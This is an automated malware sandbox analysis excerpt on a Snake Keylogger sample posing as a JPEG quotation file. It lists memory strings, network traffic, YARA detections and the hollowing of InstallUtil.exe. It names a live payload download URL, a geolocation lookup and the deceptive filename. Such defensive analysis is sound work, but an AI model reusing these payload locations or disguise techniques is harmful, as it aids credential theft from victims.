                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/panel/Skdqhzzwa.mp3
                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49732 version: TLS 1.2

                System Summary

                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                Source: initial sample, Static PE information: Filename: RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064F14F8 NtProtectVirtualMemory,0_2_064F14F8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064F2A30 NtResumeThread,0_2_064F2A30
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064F14F0 NtProtectVirtualMemory,0_2_064F14F0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064F2A29 NtResumeThread,0_2_064F2A29
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A914F8 NtProtectVirtualMemory,3_2_05A914F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A92A30 NtResumeThread,3_2_05A92A30
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A914F0 NtProtectVirtualMemory,3_2_05A914F0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A92A29 NtResumeThread,3_2_05A92A29
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 6_2_05C414F8 NtProtectVirtualMemory,6_2_05C414F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 6_2_05C42A30 NtResumeThread,6_2_05C42A30
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 6_2_05C414F0 NtProtectVirtualMemory,6_2_05C414F0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 6_2_05C42A29 NtResumeThread,6_2_05C42A29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DC4802_2_014DC480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D67482_2_014D6748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DC7622_2_014DC762
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DB7E22_2_014DB7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D46D92_2_014D46D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D98682_2_014D9868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DCA422_2_014DCA42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DBE972_2_014DBE97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D35722_2_014D3572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DB5022_2_014DB502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DE5272_2_014DE527
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DE5382_2_014DE538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DBEC02_2_014DBEC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B6E82_2_0685B6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068586082_2_06858608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685AA582_2_0685AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D6702_2_0685D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C3882_2_0685C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06858BED2_2_06858BED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B0A02_2_0685B0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685A4082_2_0685A408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D0282_2_0685D028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068511A02_2_068511A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C9D82_2_0685C9D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685BD382_2_0685BD38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855EB82_2_06855EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855EC82_2_06855EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B6D92_2_0685B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685560A2_2_0685560A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068556182_2_06855618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685AA482_2_0685AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855A602_2_06855A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D6632_2_0685D663
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855A702_2_06855A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068533A82_2_068533A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068533B82_2_068533B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06856BC12_2_06856BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06856BD02_2_06856BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685A3F82_2_0685A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068563122_2_06856312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068563202_2_06856320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068537302_2_06853730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685676A2_2_0685676A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068567782_2_06856778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C3782_2_0685C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B08F2_2_0685B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068504882_2_06850488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068574972_2_06857497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068504982_2_06850498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068574A82_2_068574A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068508E02_2_068508E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068508F02_2_068508F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068578F02_2_068578F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068500072_2_06850007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068528072_2_06852807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068528182_2_06852818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D0182_2_0685D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068544302_2_06854430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068500402_2_06850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068570402_2_06857040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068570502_2_06857050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685518A2_2_0685518A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068511912_2_06851191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068551982_2_06855198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068581A02_2_068581A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068581B02_2_068581B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C9C82_2_0685C9C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068585FC2_2_068585FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068579002_2_06857900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685BD282_2_0685BD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06850D392_2_06850D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06850D482_2_06850D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06857D482_2_06857D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06857D582_2_06857D58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022123223_2_02212322
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022120103_2_02212010
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210A583_2_02210A58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210D213_2_02210D21
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0221D2D03_2_0221D2D0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022116C53_2_022116C5
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022120B13_2_022120B1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02218F2B3_2_02218F2B
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02218F383_2_02218F38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210D6A3_2_02210D6A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210DE13_2_02210DE1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022112F63_2_022112F6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022117C63_2_022117C6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598142C3_2_0598142C
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598C0483_2_0598C048
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059800403_2_05980040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059845D83_2_059845D8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059845CA3_2_059845CA
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059856E03_2_059856E0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059800063_2_05980006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598C03A3_2_0598C03A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598ABB13_2_0598ABB1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598ABC03_2_0598ABC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CC883_2_05A9CC88
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9C1403_2_05A9C140
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A954283_2_05A95428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A954183_2_05A95418
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CC793_2_05A9CC79
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CF853_2_05A9CF85
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9566E3_2_05A9566E
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9C1313_2_05A9C131
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAE1B03_2_05AAE1B0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAA5483_2_05AAA548
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AA4C383_2_05AA4C38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAE1A13_2_05AAE1A1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAA5383_2_05AAA538
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AABB4F3_2_05AABB4F
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AD08533_2_05AD0853
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE7FB83_2_05AE7FB8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEC1003_2_05AEC100
